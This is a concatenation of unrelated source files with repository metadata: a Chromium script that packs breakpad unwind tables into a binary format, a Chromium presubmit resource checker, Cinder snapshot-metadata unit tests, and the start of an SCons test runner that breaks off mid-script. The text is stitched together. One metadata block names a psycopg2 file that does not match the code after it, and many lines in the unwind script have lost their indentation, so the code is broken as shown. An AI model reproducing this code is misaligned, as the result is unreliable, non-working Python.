"ref": "refs/heads/master",
"path": "python-3.6.2-Win64/Lib/site-packages/psycopg2/errorcodes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2105"
},
{
"name": "C",
"bytes": "470753"
},
{
"name": "C++",
"bytes": "139524"
},
{
"name": "CSS",
"bytes": "19326"
},
{
"name": "HTML",
"bytes": "54046"
},
{
"name": "JavaScript",
"bytes": "221397"
},
{
"name": "Mako",
"bytes": "9524"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "13215056"
},
{
"name": "Tcl",
"bytes": "1295070"
}
],
"symlink_target": ""
} |
"""Extracts the unwind tables in from breakpad symbol files
Runs dump_syms on the given binary file and extracts the CFI data into the
given output file.
The output file is a binary file containing CFI rows ordered based on function
address. The output file only contains rows that match the most popular rule
type in CFI table, to reduce the output size and specify data in compact format.
See doc https://github.com/google/breakpad/blob/master/docs/symbol_files.md.
1. The CFA rules should be of postfix form "SP <val> +".
2. The RA rules should be of postfix form "CFA <val> + ^".
Note: breakpad represents dereferencing address with '^' operator.
The output file has 2 tables, UNW_INDEX and UNW_DATA, inspired by the ARM EHABI
format. The first table contains function addresses and an index into the
UNW_DATA table. The second table contains one or more rows for the function
unwind information.
The output file starts with 4 bytes counting the number of entries in UNW_INDEX.
Then UNW_INDEX table and UNW_DATA table.
UNW_INDEX contains two columns of N rows each, where N is the number of
functions.
1. First column 4 byte rows of all the function start address as offset from
start of the binary, in sorted order.
2. For each function addr, the second column contains 2 byte indices in order.
The indices are offsets (in count of 2 bytes) of the CFI data from start of
UNW_DATA.
The last entry in the table always contains CANT_UNWIND index to specify the
end address of the last function.
UNW_DATA contains data of all the functions. Each function data contains N rows.
The data found at the address pointed from UNW_INDEX will be:
2 bytes: N - number of rows that belong to current function.
N * 4 bytes: N rows of data. Each 4-byte row packs:
    16 bits : Address offset from function start.
    14 bits : CFA offset / 4.
     2 bits : RA offset / 4.
The function is not added to the unwind table in following conditions:
C1. If length of the function code (number of instructions) is greater than
0xFFFF (2 byte address span). This is because we use 16 bits to refer to
offset of instruction from start of the address.
C2. If the function moves the SP by more than 0xFFFF bytes. This is because we
use 14 bits to denote CFA offset (last 2 bits are 0).
C3. If the Return Address is stored at an offset >= 16 from the CFA. Some
    functions which have variable arguments can have an offset of up to 16.
TODO(ssid): We can actually store offset 16 by subtracting 1 from RA/4 since
we never have 0.
C4: Some functions do not have unwind information defined in dwarf info. These
functions have index value CANT_UNWIND(0xFFFF) in UNW_INDEX table.
Usage:
extract_unwind_tables.py --input_path [root path to unstripped chrome.so]
--output_path [output path] --dump_syms_path [path to dump_syms binary]
"""
import argparse
import re
import struct
import subprocess
import sys
import tempfile
_CFA_REG = '.cfa'
_RA_REG = '.ra'
_ADDR_ENTRY = 0
_LENGTH_ENTRY = 1
_CANT_UNWIND = 0xFFFF
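# A minimal reader sketch for the output format described in the module
# docstring (illustration only; this helper is hypothetical and not used by
# the build; the real consumer is the native unwinder).
def _ReadUnwIndexForIllustration(path):
  """Returns (addresses, indices) parsed from a file written by this script."""
  with open(path, 'rb') as f:
    (count,) = struct.unpack('<L', f.read(4))
    addresses = struct.unpack('<%dL' % count, f.read(4 * count))
    indices = struct.unpack('<%dH' % count, f.read(2 * count))
  return list(addresses), list(indices)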
def _Write4Bytes(output_file, val):
"""Writes a 32 bit unsigned integer to the given output file."""
  output_file.write(struct.pack('<L', val))
def _Write2Bytes(output_file, val):
"""Writes a 16 bit unsigned integer to the given output file."""
  output_file.write(struct.pack('<H', val))
def _FindRuleForRegister(cfi_row, reg):
"""Returns the postfix expression as string for a given register.
Breakpad CFI row format specifies rules for unwinding each register in postfix
expression form separated by space. Each rule starts with register name and a
colon. Eg: "CFI R1: <rule> R2: <rule>".
"""
out = []
found_register = False
for part in cfi_row:
if found_register:
if part[-1] == ':':
break
out.append(part)
elif part == reg + ':':
found_register = True
return ' '.join(out)
def _GetCfaAndRaOffset(cfi_row):
"""Returns a tuple with 2 numbers (cfa_offset, ra_offset).
  Returns the correct values if the rule matches the predefined criteria, and
  (0, 0) otherwise. The criterion for the CFA rule is postfix form
  "SP <val> +" and for the RA rule postfix form "CFA -<val> + ^".
"""
cfa_offset = 0
ra_offset = 0
cfa_rule = _FindRuleForRegister(cfi_row, _CFA_REG)
ra_rule = _FindRuleForRegister(cfi_row, _RA_REG)
if cfa_rule and re.match(r'sp [0-9]+ \+', cfa_rule):
cfa_offset = int(cfa_rule.split()[1], 10)
if ra_rule:
if not re.match(r'.cfa -[0-9]+ \+ \^', ra_rule):
return (0, 0)
ra_offset = -1 * int(ra_rule.split()[1], 10)
return (cfa_offset, ra_offset)
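# Worked example for the two helpers above (hypothetical CFI row; the numbers
# are made up for illustration):
#   row = 'STACK CFI 1004 .cfa: sp 16 + .ra: .cfa -4 + ^'.split()
#   _FindRuleForRegister(row, '.cfa')  ->  'sp 16 +'
#   _FindRuleForRegister(row, '.ra')   ->  '.cfa -4 + ^'
#   _GetCfaAndRaOffset(row)            ->  (16, 4)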
def _GetAllCfiRows(symbol_file):
"""Returns parsed CFI data from given symbol_file.
Each entry in the cfi data dictionary returned is a map from function start
address to array of function rows, starting with FUNCTION type, followed by
one or more CFI rows.
"""
cfi_data = {}
current_func = []
for line in symbol_file:
line = line.decode('utf8')
if 'STACK CFI' not in line:
continue
parts = line.split()
data = {}
if parts[2] == 'INIT':
# Add the previous function to the output
if len(current_func) > 1:
cfi_data[current_func[0][_ADDR_ENTRY]] = current_func
current_func = []
# The function line is of format "STACK CFI INIT <addr> <length> ..."
data[_ADDR_ENTRY] = int(parts[3], 16)
data[_LENGTH_ENTRY] = int(parts[4], 16)
# Condition C1: Skip if length is large.
if data[_LENGTH_ENTRY] == 0 or data[_LENGTH_ENTRY] > 0xffff:
continue # Skip the current function.
else:
# The current function is skipped.
if len(current_func) == 0:
continue
# The CFI row is of format "STACK CFI <addr> .cfa: <expr> .ra: <expr> ..."
data[_ADDR_ENTRY] = int(parts[2], 16)
(data[_CFA_REG], data[_RA_REG]) = _GetCfaAndRaOffset(parts)
# Condition C2 and C3: Skip based on limits on offsets.
if data[_CFA_REG] == 0 or data[_RA_REG] >= 16 or data[_CFA_REG] > 0xffff:
current_func = []
continue
assert data[_CFA_REG] % 4 == 0
# Since we skipped functions with code size larger than 0xffff, we should
# have no function offset larger than the same value.
assert data[_ADDR_ENTRY] - current_func[0][_ADDR_ENTRY] < 0xffff
if data[_ADDR_ENTRY] == 0:
# Skip current function, delete all previous entries.
current_func = []
continue
assert data[_ADDR_ENTRY] % 2 == 0
current_func.append(data)
# Condition C4: Skip function without CFI rows.
if len(current_func) > 1:
cfi_data[current_func[0][_ADDR_ENTRY]] = current_func
return cfi_data
def _WriteCfiData(cfi_data, out_file):
"""Writes the CFI data in defined format to out_file."""
# Stores the final data that will be written to UNW_DATA table, in order
# with 2 byte items.
unw_data = []
# Represent all the CFI data of functions as set of numbers and map them to an
# index in the |unw_data|. This index is later written to the UNW_INDEX table
# for each function. This map is used to find index of the data for functions.
data_to_index = {}
# Store mapping between the functions to the index.
func_addr_to_index = {}
previous_func_end = 0
for addr, function in sorted(cfi_data.items()):
    # Add an empty (CANT_UNWIND) function entry when CFI rows are missing
    # between 2 functions.
if previous_func_end != 0 and addr - previous_func_end > 4:
func_addr_to_index[previous_func_end + 2] = _CANT_UNWIND
previous_func_end = addr + cfi_data[addr][0][_LENGTH_ENTRY]
assert len(function) > 1
func_data_arr = []
func_data = 0
# The first row contains the function address and length. The rest of the
# rows have CFI data. Create function data array as given in the format.
for row in function[1:]:
addr_offset = row[_ADDR_ENTRY] - addr
cfa_offset = (row[_CFA_REG]) | (row[_RA_REG] // 4)
func_data_arr.append(addr_offset)
func_data_arr.append(cfa_offset)
# Consider all the rows in the data as one large integer and add it as a key
# to the |data_to_index|.
for data in func_data_arr:
func_data = (func_data << 16) | data
row_count = len(func_data_arr) // 2
if func_data not in data_to_index:
# When data is not found, create a new index = len(unw_data), and write
# the data to |unw_data|.
index = len(unw_data)
data_to_index[func_data] = index
unw_data.append(row_count)
for row in func_data_arr:
unw_data.append(row)
else:
# If the data was found, then use the same index for the function.
index = data_to_index[func_data]
assert row_count == unw_data[index]
func_addr_to_index[addr] = data_to_index[func_data]
  # Mark the end of the last function entry.
func_addr_to_index[previous_func_end + 2] = _CANT_UNWIND
  # Write the number of entries in the UNW_INDEX table.
_Write4Bytes(out_file, len(func_addr_to_index))
# Write the UNW_INDEX table. First list of addresses and then indices.
sorted_unw_index = sorted(func_addr_to_index.items())
for addr, index in sorted_unw_index:
_Write4Bytes(out_file, addr)
for addr, index in sorted_unw_index:
_Write2Bytes(out_file, index)
# Write the UNW_DATA table.
for data in unw_data:
_Write2Bytes(out_file, data)
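# Decoding sketch for one packed UNW_DATA row; the inverse of the packing in
# _WriteCfiData above (hypothetical helper, illustration only):
def _UnpackDataRowForIllustration(packed_cfa_ra):
  """Splits a packed 16-bit CFA/RA word back into byte offsets."""
  cfa_offset = packed_cfa_ra & 0xfffc    # top 14 bits; always a multiple of 4
  ra_offset = (packed_cfa_ra & 0x3) * 4  # low 2 bits store RA offset / 4
  return cfa_offset, ra_offset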
def _ParseCfiData(sym_stream, output_path):
cfi_data = _GetAllCfiRows(sym_stream)
with open(output_path, 'wb') as out_file:
_WriteCfiData(cfi_data, out_file)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_path', required=True,
help='The input path of the unstripped binary')
parser.add_argument(
'--output_path', required=True,
help='The path of the output file')
parser.add_argument(
'--dump_syms_path', required=True,
help='The path of the dump_syms binary')
args = parser.parse_args()
cmd = ['./' + args.dump_syms_path, args.input_path]
proc = subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE)
_ParseCfiData(proc.stdout, args.output_path)
assert proc.wait() == 0
return 0
if __name__ == '__main__':
sys.exit(main())
| {
"content_hash": "171ce2c200e928fdaa88a7fcb3fa7a9c",
"timestamp": "",
"source": "github",
"line_count": 280,
"max_line_length": 80,
"avg_line_length": 36.375,
"alnum_prop": 0.6745213549337261,
"repo_name": "youtube/cobalt_sandbox",
"id": "25c3130e635385d9dd527ed9276d9f0f4f458204",
"size": "10371",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "build/android/gyp/extract_unwind_tables.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
Presubmit for Chromium HTML/CSS/JS resources. See chrome/browser/PRESUBMIT.py.
"""
from . import regex_check
class ResourceChecker(object):
def __init__(self, input_api, output_api, file_filter=None):
self.input_api = input_api
self.output_api = output_api
self.file_filter = file_filter
def DeprecatedMojoBindingsCheck(self, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
        r'(mojo_bindings\.js)', 'Please use mojo_bindings_lite.js in new code')
def DisallowIncludeCheck(self, msg, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
        r'^\s*(?:\/[\*\/])?\s*(<include)\s*src=', msg)
# This is intentionally not included in RunChecks(). It's an optional check
# that can be used from a PRESUBMIT.py in a directory that does not wish to
# use <include> (i.e. uses a different bundling mechanism, does not grit
# process, etc.).
def DisallowIncludes(self, msg):
check = lambda *args: self.DisallowIncludeCheck(msg, *args)
return self._RunCheckOnAffectedFiles(check, 'Found resource errors in %s',
is_error=True)
def SelfClosingIncludeCheck(self, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
'(</include>|<include.*/>)', 'Closing <include> tags is unnecessary.')
def RunChecks(self):
msg = 'Found resources style issues in %s'
# TODO(crbug.com/931798): is_error for Mojo check when -lite is majority?
return self._RunCheckOnAffectedFiles(self.DeprecatedMojoBindingsCheck,
msg, only_changed_lines=True) + \
self._RunCheckOnAffectedFiles(self.SelfClosingIncludeCheck, msg)
def _RunCheckOnAffectedFiles(self, check, msg_template, is_error=False,
only_changed_lines=False):
"""Check for violations of the Chromium web development style guide. See
https://chromium.googlesource.com/chromium/src/+/main/styleguide/web/web.md
"""
results = []
    affected_files = self.input_api.AffectedFiles(file_filter=self.file_filter,
include_deletes=False)
for f in affected_files:
errors = []
if only_changed_lines:
contents = f.ChangedContents()
else:
contents = enumerate(f.NewContents(), start=1)
for line_number, line in contents:
error = check(line_number, line)
if error:
errors.append(error)
if errors:
abs_local_path = f.AbsoluteLocalPath()
msg = msg_template % abs_local_path + '\n\n' + '\n'.join(errors) + '\n'
if is_error:
results.append(self.output_api.PresubmitError(msg))
else:
results.append(self.output_api.PresubmitPromptWarning(msg))
return results
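# Minimal usage sketch (hypothetical PRESUBMIT.py snippet; the hook name
# follows the depot_tools presubmit convention and is assumed here):
#
#   def CheckChangeOnUpload(input_api, output_api):
#     return resource_checker.ResourceChecker(input_api, output_api).RunChecks()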
| {
"content_hash": "5a0baeabb5e1ad019999e32b62958317",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 82,
"avg_line_length": 40.77142857142857,
"alnum_prop": 0.6527680448493343,
"repo_name": "chromium/chromium",
"id": "8365d9bbc87b7942d0a5c0fe474322b5b1d0df12",
"size": "2995",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "tools/web_dev_style/resource_checker.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import uuid
from oslo_config import cfg
from oslo_serialization import jsonutils
import webob
from cinder.api import extensions
from cinder.api.v2 import snapshot_metadata
from cinder.api.v2 import snapshots
import cinder.db
from cinder import exception
from cinder import test
from cinder.tests.api import fakes
CONF = cfg.CONF
def return_create_snapshot_metadata_max(context,
snapshot_id,
metadata,
delete):
return stub_max_snapshot_metadata()
def return_create_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_snapshot_metadata()
def return_create_snapshot_metadata_insensitive(context, snapshot_id,
metadata, delete):
return stub_snapshot_metadata_insensitive()
def return_new_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_new_snapshot_metadata()
def return_snapshot_metadata(context, snapshot_id):
if not isinstance(snapshot_id, str) or not len(snapshot_id) == 36:
msg = 'id %s must be a uuid in return snapshot metadata' % snapshot_id
raise Exception(msg)
return stub_snapshot_metadata()
def return_empty_snapshot_metadata(context, snapshot_id):
return {}
def return_empty_container_metadata(context, snapshot_id, metadata, delete):
return {}
def delete_snapshot_metadata(context, snapshot_id, key):
pass
def stub_snapshot_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_snapshot_metadata_insensitive():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4",
}
return metadata
def stub_new_snapshot_metadata():
metadata = {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
}
return metadata
def stub_max_snapshot_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_snapshot(context, snapshot_id):
return {'id': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'status': 'available',
'metadata': {}}
def return_volume(context, volume_id):
return {'id': 'fake-vol-id',
'size': 100,
'name': 'fake',
'host': 'fake-host',
'status': 'available',
'encryption_key_id': None,
'volume_type_id': None,
'migration_status': None,
'metadata': {},
'project_id': context.project_id}
def return_snapshot_nonexistent(context, snapshot_id):
raise exception.SnapshotNotFound(snapshot_id=snapshot_id)
def fake_update_snapshot_metadata(self, context, snapshot, diff):
pass
class SnapshotMetaDataTest(test.TestCase):
def setUp(self):
super(SnapshotMetaDataTest, self).setUp()
self.volume_api = cinder.volume.api.API()
self.stubs.Set(cinder.db, 'volume_get', return_volume)
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot)
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(self.volume_api, 'update_snapshot_metadata',
fake_update_snapshot_metadata)
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.snapshot_controller = snapshots.SnapshotsController(self.ext_mgr)
self.controller = snapshot_metadata.Controller()
self.req_id = str(uuid.uuid4())
self.url = '/v2/fake/snapshots/%s/metadata' % self.req_id
snap = {"volume_size": 100,
"volume_id": "fake-vol-id",
"display_name": "Volume Test Name",
"display_description": "Volume Test Desc",
"availability_zone": "zone1:host1",
"host": "fake-host",
"metadata": {}}
body = {"snapshot": snap}
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.snapshot_controller.create(req, body)
def test_index(self):
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
res_dict = self.controller.show(req, self.req_id, 'key2')
expected = {'meta': {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key6')
def test_delete(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_delete',
delete_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.req_id, 'key2')
self.assertEqual(200, res.status_int)
def test_delete_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key6')
def test_create(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(body, res_dict)
def test_create_with_keys_in_uppercase_and_lowercase(self):
        # If keys are given in both uppercase and lowercase, the response
        # should contain the ones the server added.
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata_insensitive)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"KEY1": "value1",
"key2": "value2",
"KEY2": "value2",
"key3": "value3",
"KEY4": "value4"}}
expected = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(expected, res_dict)
def test_create_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, None)
def test_create_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, body)
def test_create_item_key_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
req, self.req_id, body)
def test_create_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.req_id, body)
def test_update_all(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
def test_update_all_with_keys_in_uppercase_and_lowercase(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_create_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {
'metadata': {
'key10': 'value10',
'KEY10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, body)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_empty_container_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
def test_update_all_malformed_container(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_malformed_data(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body)
def test_update_item(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.req_id, 'key1', body)
expected = {'meta': {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(
'/v2/fake/snapshots/asdf/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
None)
def test_update_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, '', body)
def test_update_item_key_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, ("a" * 260), body)
def test_update_item_value_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, "key1", body)
def test_update_item_too_many_keys(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'bad',
body)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
        # test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
        # test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
        # test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, data)
| {
"content_hash": "ddeb418d997c543d038dff4d7f47bda7",
"timestamp": "",
"source": "github",
"line_count": 538,
"max_line_length": 78,
"avg_line_length": 38.11524163568773,
"alnum_prop": 0.567833804740076,
"repo_name": "blueboxgroup/cinder",
"id": "2fd62ca3707762107cab57ec913bd9bef01fb01f",
"size": "21142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cinder/tests/api/v2/test_snapshot_metadata.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3322"
},
{
"name": "Python",
"bytes": "10024269"
},
{
"name": "Shell",
"bytes": "9905"
}
],
"symlink_target": ""
} |
import getopt
import imp
import os
import os.path
import sys
import tempfile
import time
import zipfile
try:
# try Python 3.x style
from urllib.request import urlretrieve
except ImportError:
# nope, must be 2.x; this hack is equivalent
import imp
# protect import from fixer
urlretrieve = imp.load_module('urllib',
*imp.find_module('urllib')).urlretrieve
helpstr = """\
Usage: scons-test.py [-f zipfile] [-o outdir] [-v] [--xml] [runtest arguments]
Options:
-f FILE Specify input .zip FILE name
-o DIR, --out DIR Change output directory name to DIR
-v, --verbose Print file names when extracting
--xml XML output
"""
opts, args = getopt.getopt(sys.argv[1:],
"f:o:v",
['file=', 'out=', 'verbose', 'xml'])
format = None
outdir = None
printname = lambda x: x
inputfile = 'http://scons.sourceforge.net/scons-src-latest.zip'
for o, a in opts:
if o == '-f' or o == '--file':
inputfile = a
elif o == '-o' or o == '--out':
outdir = a
elif o == '-v' or o == '--verbose':
def printname(x):
print x
elif o == '--xml':
format = o
startdir = os.getcwd()
tempfile.template = 'scons-test.'
